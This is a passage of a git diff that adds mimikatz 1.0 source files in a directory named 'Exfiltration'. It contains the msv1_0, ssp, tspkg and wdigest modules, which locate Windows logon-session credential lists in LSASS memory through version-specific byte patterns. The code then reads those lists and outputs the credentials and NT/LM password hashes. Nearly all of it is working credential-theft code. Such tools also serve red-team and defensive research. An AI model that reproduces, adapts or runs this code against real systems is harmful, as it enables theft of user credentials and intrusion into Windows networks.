+		String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress)));
+}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h
new file mode 100644
index 0000000..cf8ccac
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h
@@ -0,0 +1,105 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_msv1_0 {
+
+private:
+	typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
+		PVOID unk0; // next?
+		LSA_UNICODE_STRING Primary;
+		LSA_UNICODE_STRING Credentials;
+	} KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS;
+
+	typedef struct _KIWI_MSV1_0_CREDENTIALS {
+		PVOID unk0; // next?
+		DWORD AuthenticationPackageId;
+		PVOID PrimaryCredentials;
+	} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
+
+	typedef struct _KIWI_MSV1_0_LIST_5 {
+		struct _KIWI_MSV1_0_LIST_5 *Flink;
+		struct _KIWI_MSV1_0_LIST_5 *Blink;
+		LUID LocallyUniqueIdentifier;
+		LSA_UNICODE_STRING UserName;
+		LSA_UNICODE_STRING Domaine;
+		PVOID unk14; // 0
+		PVOID unk15; // 0
+		PVOID unk16; // offset unk_181A080
+		DWORD unk17; // 0Ah
+		DWORD unk18; // 2
+	#ifdef _M_IX86
+		DWORD unk19;
+	#endif
+		DWORD unk20; // 5AC4186Ch
+		DWORD unk21; // 1CD6BFDh
+		LSA_UNICODE_STRING LogonServer;
+		PKIWI_MSV1_0_CREDENTIALS Credentials;
+		PVOID unk22; // 0C14h
+		PVOID unk23; // 0BFCh
+	} KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5;
+
+	typedef struct _KIWI_MSV1_0_LIST_6 {
+		struct _KIWI_MSV1_0_LIST_6 *Flink;
+		struct _KIWI_MSV1_0_LIST_6 *Blink;
+		PVOID unk0;	// unk_18457A0
+		DWORD unk1; // 0FFFFFFFFh
+		DWORD unk2; // 0
+		PVOID unk3; // 0
+		PVOID unk4; // 0
+		PVOID unk5; // 0
+		PVOID unk6; // 0C04h
+		PVOID unk7; // 0
+		PVOID unk8; // 0C08h
+		PVOID unk9; // 0
+		PVOID unk10; // 0
+		DWORD unk11; // 0
+		DWORD unk12; // 0
+		PVOID unk13; // offset off_18456A0
+		LUID LocallyUniqueIdentifier;
+		LUID SecondaryLocallyUniqueIdentifier;
+		LSA_UNICODE_STRING UserName;
+		LSA_UNICODE_STRING Domaine;
+		PVOID unk14; // 0		Windows  8 + 2*PVOID / 4*PVOID!!
+		PVOID unk15; // 0
+		PVOID unk16; // offset unk_181A080
+		DWORD unk17; // 0Ah
+		DWORD unk18; // 2
+	#ifdef _M_IX86
+		DWORD unk19;
+	#endif
+		DWORD unk20; // 5AC4186Ch
+		DWORD unk21; // 1CD6BFDh
+		LSA_UNICODE_STRING LogonServer;
+		PKIWI_MSV1_0_CREDENTIALS Credentials;
+		PVOID unk22; // 0C14h
+		PVOID unk23; // 0BFCh
+	} KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6;
+
+	typedef struct _MSV1_0_PRIMARY_CREDENTIAL { 
+		LSA_UNICODE_STRING LogonDomainName; 
+		LSA_UNICODE_STRING UserName; 
+		BYTE NtOwfPassword[0x10];
+		BYTE LmOwfPassword[0x10];
+		BOOLEAN NtPasswordPresent; 
+		BOOLEAN LmPasswordPresent;
+		wchar_t BuffDomaine[MAX_DOMAIN_LEN];
+		wchar_t BuffUserName[MAX_USERNAME_LEN];
+	} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; 
+
+	static void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true);
+
+	static PLIST_ENTRY LogonSessionList;
+	static PULONG LogonSessionListCount;
+	static bool searchLogonSessionList();
+
+	static bool decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity);
+public:
+	static bool getMSV(vector<wstring> * arguments);
+	static bool WINAPI getMSVLogonData(__in PLUID logId, __in bool justSecurity);
+};
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
new file mode 100644
index 0000000..86dab86
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
@@ -0,0 +1,92 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "ssp.h"
+#include "..\..\global.h"
+mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_ssp::pModMSV = NULL;
+mod_mimikatz_sekurlsa_ssp::PKIWI_SSP_CREDENTIAL_LIST_ENTRY mod_mimikatz_sekurlsa_ssp::SspCredentialList = NULL;
+
+bool mod_mimikatz_sekurlsa_ssp::getSSP(vector<wstring> * arguments)
+{
+	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getSSPLogonData, wstring(L"ssp")));
+	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
+}
+
+bool mod_mimikatz_sekurlsa_ssp::searchSSPEntryList()
+{
+#ifdef _M_X64
+	BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
+	LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3;
+	BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15};
+	LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3;
+#elif defined _M_IX86
+	BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
+	LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1;
+#endif
+
+	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModMSV && !SspCredentialList)
+	{
+		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
+		pointeur= reinterpret_cast<PBYTE *>(&SspCredentialList);
+
+#ifdef _M_X64
+		if(mod_system::GLOB_Version.dwMajorVersion < 6)
+		{
+			pattern = PTRN_WIN5_SspCredentialList;
+			taille = sizeof(PTRN_WIN5_SspCredentialList);
+			offset = OFFS_WIN5_SspCredentialList;
+		}
+		else
+		{
+			pattern = PTRN_WIN6_SspCredentialList;
+			taille = sizeof(PTRN_WIN6_SspCredentialList);
+			offset = OFFS_WIN6_SspCredentialList;
+		}
+#elif defined _M_IX86
+		pattern = PTRN_WALL_SspCredentialList;
+		taille = sizeof(PTRN_WALL_SspCredentialList);
+		offset = OFFS_WALL_SspCredentialList;
+#endif
+		if(HMODULE monModule = LoadLibrary(L"msv1_0"))
+		{
+			MODULEINFO mesInfos;
+			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
+			{
+				mod_memory::genericPatternSearch(pointeur, L"msv1_0", pattern, taille, offset);
+				*pointeur += pModMSV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
+			}
+			FreeLibrary(monModule);
+		}
+	}
+	return (SspCredentialList != NULL);
+}
+
+bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bool justSecurity)
+{
+	if(searchSSPEntryList())
+	{
+		KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
+		DWORD monNb = 0;
+		if(mod_memory::readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
+		{
+			while(mesCredentials.Flink != SspCredentialList)
+			{
+				if(mod_memory::readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
+				{
+					if(RtlEqualLuid(logId, &(mesCredentials.LogonId)))
+					{
+						mod_mimikatz_sekurlsa::genericCredsToStream(&mesCredentials.credentials, justSecurity, true, &monNb);
+						monNb++;
+					}
+				}
+			}
+		}
+	}
+	else (*outputStream) << L"n.a. (SSP KO)";
+
+	return true;
+}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h
new file mode 100644
index 0000000..d2d5396
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h
@@ -0,0 +1,32 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_ssp {
+
+private:
+	typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
+		struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink;
+		struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink;
+		ULONG References;
+		ULONG CredentialReferences;
+		LUID LogonId;
+		ULONG unk0;
+		ULONG unk1;
+		ULONG unk2;
+		KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
+	} KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY;
+
+	static PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList;
+	static bool searchSSPEntryList();
+
+public:
+	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModMSV;
+	static bool getSSP(vector<wstring> * arguments);
+	static bool WINAPI getSSPLogonData(__in PLUID logId, __in bool justSecurity);
+};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp
new file mode 100644
index 0000000..71e3751
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp
@@ -0,0 +1,94 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "tspkg.h"
+#include "..\..\global.h"
+mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_tspkg::pModTSPKG = NULL;
+PRTL_AVL_TABLE mod_mimikatz_sekurlsa_tspkg::TSGlobalCredTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL);
+
+bool mod_mimikatz_sekurlsa_tspkg::getTsPkg(vector<wstring> * arguments)
+{
+	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getTsPkgLogonData, wstring(L"tspkg")));
+	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
+}
+
+bool mod_mimikatz_sekurlsa_tspkg::searchTSPKGFuncs()
+{
+#ifdef _M_X64
+	BYTE PTRN_WALL_TSGlobalCredTable[]	= {0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d};
+	LONG OFFS_WALL_TSGlobalCredTable	= sizeof(PTRN_WALL_TSGlobalCredTable);
+#elif defined _M_IX86
+	BYTE PTRN_WNO8_TSGlobalCredTable[]	= {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe};
+	LONG OFFS_WNO8_TSGlobalCredTable	= sizeof(PTRN_WNO8_TSGlobalCredTable);
+
+	BYTE PTRN_WIN8_TSGlobalCredTable[]	= {0x8b, 0xff, 0x53, 0xbb};
+	LONG OFFS_WIN8_TSGlobalCredTable	= sizeof(PTRN_WIN8_TSGlobalCredTable);
+#endif
+
+	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModTSPKG && !TSGlobalCredTable)
+	{
+		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
+
+		pointeur= reinterpret_cast<PBYTE *>(&TSGlobalCredTable);
+#ifdef _M_X64
+		pattern	= PTRN_WALL_TSGlobalCredTable;
+		taille	= sizeof(PTRN_WALL_TSGlobalCredTable);
+		offset	= OFFS_WALL_TSGlobalCredTable;
+#elif defined _M_IX86
+		if(mod_system::GLOB_Version.dwBuildNumber < 8000)
+		{
+			pattern	= PTRN_WNO8_TSGlobalCredTable;
+			taille	= sizeof(PTRN_WNO8_TSGlobalCredTable);
+			offset	= OFFS_WNO8_TSGlobalCredTable;
+		}
+		else
+		{
+			pattern	= PTRN_WIN8_TSGlobalCredTable;
+			taille	= sizeof(PTRN_WIN8_TSGlobalCredTable);
+			offset	= OFFS_WIN8_TSGlobalCredTable;
+		}
+#endif
+
+		if(HMODULE monModule = LoadLibrary(L"tspkg"))
+		{
+			MODULEINFO mesInfos;
+			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
+			{
+				mod_memory::genericPatternSearch(pointeur, L"tspkg", pattern, taille, offset);
+				*pointeur += pModTSPKG->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
+			}
+			FreeLibrary(monModule);
+		}
+	}
+	return (pModTSPKG && TSGlobalCredTable);
+}
+
+bool WINAPI mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData(__in PLUID logId, __in bool justSecurity)
+{
+	if(searchTSPKGFuncs())
+	{
+		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
+		BYTE * monBuffP = new BYTE[sizeof(KIWI_TS_CREDENTIAL)], * monBuffC = new BYTE[sizeof(KIWI_TS_PRIMARY_CREDENTIAL)];
+		if(PKIWI_TS_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(TSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId)))
+		{
+			if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_TS_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
+			{
+				pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(monBuffP);
+				if(pLogSession->pTsPrimary)
+				{
+					if(mod_memory::readMemory(pLogSession->pTsPrimary, monBuffC, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
+						mesCreds = &(reinterpret_cast<PKIWI_TS_PRIMARY_CREDENTIAL>(monBuffC)->credentials);
+				}
+				else (*outputStream) << L"n.s. (SuppCred KO) / ";
+			}
+		}
+		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true);
+		delete [] monBuffC, monBuffP;
+	}
+	else (*outputStream) << L"n.a. (tspkg KO)";
+	return true;
+}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
new file mode 100644
index 0000000..35a3b15
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
@@ -0,0 +1,37 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_tspkg {
+
+private:
+	typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
+		PVOID unk0;	// lock ?
+		KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
+	} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
+
+	typedef struct _KIWI_TS_CREDENTIAL {
+	#ifdef _M_X64
+		BYTE unk0[108];
+	#elif defined _M_IX86
+		BYTE unk0[64];
+	#endif
+		LUID LocallyUniqueIdentifier;
+		PVOID unk1;
+		PVOID unk2;
+		PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
+	} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
+
+	static PRTL_AVL_TABLE TSGlobalCredTable;
+	static bool searchTSPKGFuncs();
+
+public:
+	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG;
+	static bool getTsPkg(vector<wstring> * arguments);
+	static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity);
+};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp
new file mode 100644
index 0000000..b6e3062
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp
@@ -0,0 +1,91 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "wdigest.h"
+#include "..\..\global.h"
+mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_wdigest::pModWDIGEST = NULL;
+mod_mimikatz_sekurlsa_wdigest::PKIWI_WDIGEST_LIST_ENTRY mod_mimikatz_sekurlsa_wdigest::l_LogSessList = NULL;
+long mod_mimikatz_sekurlsa_wdigest::offsetWDigestPrimary = 0;
+
+bool mod_mimikatz_sekurlsa_wdigest::getWDigest(vector<wstring> * arguments)
+{
+	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
+	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getWDigestLogonData, wstring(L"wdigest")));
+	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
+}
+
+bool mod_mimikatz_sekurlsa_wdigest::searchWDigestEntryList()
+{
+#ifdef _M_X64
+	BYTE PTRN_WNO8_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5b, 0x08, 0x48, 0x8d};
+	BYTE PTRN_W8CP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x4b, 0x08, 0x49, 0x8b, 0x43, 0x08, 0x4c, 0x39};
+	BYTE PTRN_W8RP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85};
+#elif defined _M_IX86
+	BYTE PTRN_WNO8_InsertInLogSess[]= {0x8b, 0x45, 0x08, 0x89, 0x08, 0xc7, 0x40, 0x04};
+	BYTE PTRN_W8CP_InsertInLogSess[]= {0x89, 0x0e, 0x89, 0x56, 0x04, 0x8b, 0x41, 0x04};
+	BYTE PTRN_W8RP_InsertInLogSess[]= {0x89, 0x06, 0x89, 0x4e, 0x04, 0x39, 0x48, 0x04};
+#endif
+	LONG OFFS_WALL_InsertInLogSess	= -4;
+
+	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModWDIGEST && !l_LogSessList)
+	{
+		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
+
+		pointeur= reinterpret_cast<PBYTE *>(&l_LogSessList);
+		offset	= OFFS_WALL_InsertInLogSess;
+		if(mod_system::GLOB_Version.dwBuildNumber < 8000)
+		{
+			pattern	= PTRN_WNO8_InsertInLogSess;
+			taille	= sizeof(PTRN_WNO8_InsertInLogSess);
+		}
+		else if(mod_system::GLOB_Version.dwBuildNumber < 8400)
+		{
+			pattern	= PTRN_W8CP_InsertInLogSess;
+			taille	= sizeof(PTRN_W8CP_InsertInLogSess);
+		}
+		else
+		{
+			pattern	= PTRN_W8RP_InsertInLogSess;
+			taille	= sizeof(PTRN_W8RP_InsertInLogSess);
+		}
+
+		if(HMODULE monModule = LoadLibrary(L"wdigest"))
+		{
+			MODULEINFO mesInfos;
+			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
+			{
+				mod_memory::genericPatternSearch(pointeur, L"wdigest", pattern, taille, offset, "SpInstanceInit", false);
+				*pointeur += pModWDIGEST->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
+			}
+			FreeLibrary(monModule);
+		}
+
+#ifdef _M_X64
+		offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 48) : 48);
+#elif defined _M_IX86
+		offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 28) : 32);
+#endif
+	}
+	return (pModWDIGEST && l_LogSessList);
+}
+
+bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity)
+{
+	if(searchWDigestEntryList())
+	{
+		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
+		DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
+		BYTE * monBuff = new BYTE[taille];
+		if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
+			if(	mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
+				mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(monBuff) + offsetWDigestPrimary);
+		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
+		delete [] monBuff;
+	}
+	else (*outputStream) << L"n.a. (wdigest KO)";
+
+	return true;
+}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h
new file mode 100644
index 0000000..9db3c8b
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h
@@ -0,0 +1,29 @@
+/*	Benjamin DELPY `gentilkiwi`
+	http://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence    : http://creativecommons.org/licenses/by/3.0/fr/
+	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_wdigest {
+
+private:
+	typedef struct _KIWI_WDIGEST_LIST_ENTRY {
+		struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
+		struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
+		DWORD	UsageCount;
+		struct _KIWI_WDIGEST_LIST_ENTRY *This;
+		LUID LocallyUniqueIdentifier;
+	} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
+
+	static PKIWI_WDIGEST_LIST_ENTRY l_LogSessList;
+	static long offsetWDigestPrimary;
+	static bool searchWDigestEntryList();
+
+public:
+	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModWDIGEST;
+	static bool getWDigest(vector<wstring> * arguments);
+	static bool WINAPI getWDigestLogonData(__in PLUID logId, __in bool justSecurity);
+};
\ No newline at end of file